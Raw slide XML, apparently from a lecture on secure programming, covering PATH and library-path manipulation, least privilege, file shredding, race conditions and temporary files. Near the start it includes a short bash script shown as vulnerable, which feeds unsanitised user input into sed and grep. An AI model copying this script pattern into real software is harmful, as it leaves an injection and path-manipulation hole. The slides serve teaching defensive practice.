              </a:rPr>
              <a:t>#!/bin/bash  PATH=”/sbin:/bin:/usr/sbin:/usr/bin”  export</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>PATH</a:t>
            </a:r>
            <a:endParaRPr sz="1650">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="121285">
              <a:lnSpc>
                <a:spcPts val="1760"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1650" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>user=`echo </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="-45" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'s/@.*$//'`</a:t>
            </a:r>
            <a:endParaRPr sz="1650">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="121285">
              <a:lnSpc>
                <a:spcPts val="1914"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1650" spc="10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>grep </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/var/local/accounts/ipaddrs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32151" y="1009141"/>
            <a:ext cx="55930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Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Compiled</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-85" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Programs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If they invoke other programs, compiled</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>programs  can be vulnerable to </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-155" dirty="0"/>
              <a:t>PATH </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>variable</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="105" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>manipulation</a:t>
            </a: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650" algn="l"/>
                <a:tab pos="756285" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>must reset to “safe”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values</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="1019175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If dynamically linked, may be vulnerable to  manipulation </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-55" dirty="0"/>
              <a:t>LD_LIBRARY_PATH</a:t>
            </a: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650" algn="l"/>
                <a:tab pos="756285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locate suitable dynamic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library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650" algn="l"/>
                <a:tab pos="756285" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>must </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>either </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>statically link </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>privileged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650" algn="l"/>
                <a:tab pos="756285" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>or prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of this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variable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2850" y="1006855"/>
            <a:ext cx="5092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Software Quality vs</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="15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042"/>
            <a:ext cx="8010525" cy="470344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Software quality and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reliability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accidental failure of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from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>theoretically random </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>unanticipated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input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improve </a:t>
            </a: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structured design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testing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not how many errors, but how often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triggered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Software security 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related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but attacker chooses input distribution, specifically  targeting buggy code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exploit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triggered by often very unlikely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inputs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which </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>common tests </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>don’t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identify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26576" y="6888788"/>
            <a:ext cx="14986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8066" y="1006855"/>
            <a:ext cx="39211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Use of Least</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-30" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Privilege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55546"/>
            <a:ext cx="7772400" cy="44259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98488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Exploit of flaws may give attacker greater  privileges - privilege escalation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Hence, run programs with least privilege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needed  to complete their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determine </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>suitable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>user and group to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whether </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>grant extra user or group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privileges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latter </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>preferred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20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>safer, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>may </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>not be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sufficient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ensure can only modify files/dirs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needed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otherwise compromise results in greater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damage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recheck </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>these when </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>moved or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upgraded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27679" y="1006855"/>
            <a:ext cx="40030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Root/Admin</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Programs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2077465"/>
            <a:ext cx="7701280" cy="445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962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Programs with root / administrator privileges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major </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>target </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of attackers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since provide </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>highest levels of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 needed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manage access to protected system  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>resources, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5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network server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ports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Often privilege only needed at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start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 then run as normal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user</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="527685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Good </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>design partitions complex programs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  smaller modules with needed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privileges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41009" y="794258"/>
            <a:ext cx="437832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94385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System Calls and  Standard Library</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-5" dirty="0"/>
              <a:t>Functions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993139" y="2001265"/>
            <a:ext cx="7526020" cy="3343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Programs use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calls and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>standard </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>library  functions for common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operations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and make </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>assumptions about their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operation</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" marR="454659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incorrect behavior may </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>be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result of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  optimizing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>access to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>shared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buffering, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>re-sequencing, modifying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requests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can conflict </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>with program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goals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114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40455" y="1006855"/>
            <a:ext cx="3776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Secure File</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Shredder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8702" y="2580624"/>
            <a:ext cx="8300084" cy="1534795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
          <a:ln w="26448">
            <a:solidFill>
              <a:srgbClr val="00000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102870">
              <a:lnSpc>
                <a:spcPts val="1610"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="535"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, …</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="50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]</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="102870" marR="5939790">
              <a:lnSpc>
                <a:spcPts val="1550"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="90"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>open file for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-50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writing  for each</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20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pattern</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="423545">
              <a:lnSpc>
                <a:spcPts val="1445"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>seek to start of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5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file</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="102870" marR="4011929" indent="320675">
              <a:lnSpc>
                <a:spcPts val="1550"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="90"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>overwrite file contents with pattern  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>close file</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="102870">
              <a:lnSpc>
                <a:spcPts val="1510"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>remove</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5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file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8702" y="4347321"/>
            <a:ext cx="8300084" cy="1927225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
          <a:ln w="26448">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="67310" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="102870">
              <a:lnSpc>
                <a:spcPts val="1614"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="530"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, …</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="50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]</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="102870" marR="6046470">
              <a:lnSpc>
                <a:spcPts val="1540"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>open file for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-55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update  for each</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20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pattern</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="423545">
              <a:lnSpc>
                <a:spcPts val="1455"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>seek to start of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5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file</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="423545" marR="4011929">
              <a:lnSpc>
                <a:spcPts val="1540"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>overwrite file contents with pattern  flush application </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>buffers</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="102870" marR="3370579" indent="321310">
              <a:lnSpc>
                <a:spcPts val="1540"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sync file system write buffers with device  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>close file</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="102870">
              <a:lnSpc>
                <a:spcPts val="1520"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>remove</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>file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21739" y="2016505"/>
            <a:ext cx="6852284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9690" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>“Deleted” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>files </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>not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really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gone.	How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fix?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69339" y="6349998"/>
            <a:ext cx="3895725" cy="851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Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Or, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>see DBAN </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(“Darik’s </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Boot </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and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Nuke”)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00">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1153795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34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Race</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Conditions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32842"/>
            <a:ext cx="7477125" cy="468947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Programs may access shared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mailbox file, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>CGI data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file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need suitable synchronization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mechanisms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lock on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>shared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Alternatives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lockfile - create/check, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-25" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>advisory,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atomic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advisory file lock - </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g.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flock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mandatory file lock - </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5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fcntl, need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release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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>later mechanisms vary between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O/S</a:t>
            </a:r>
            <a:endParaRPr sz="24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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>have subtle </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>complexities in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33598" y="1006855"/>
            <a:ext cx="3790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Safe </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t>Temporary</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Files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446009" cy="480314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Many programs use temporary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files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Often they are in common, shared system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area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Must be unique, not accessed by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-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others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Common to create a name using process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ID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unique, but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predictable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attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>might guess and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>attempt to create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own  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>between program checking and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creating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Secure temp files need random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names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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>older functions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unsafe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must need correct permissions on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file/dir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81732" y="1006855"/>
            <a:ext cx="4694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Other </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Program</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-70" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Interaction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462520" cy="44176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Programs often use services of other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programs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identify/verify </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>assumptions </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>on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Especially older user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programs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now used </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>within web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interfaces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must ensure </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>safe </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>usage of these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programs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Issue of data confidentiality / integrity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within </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
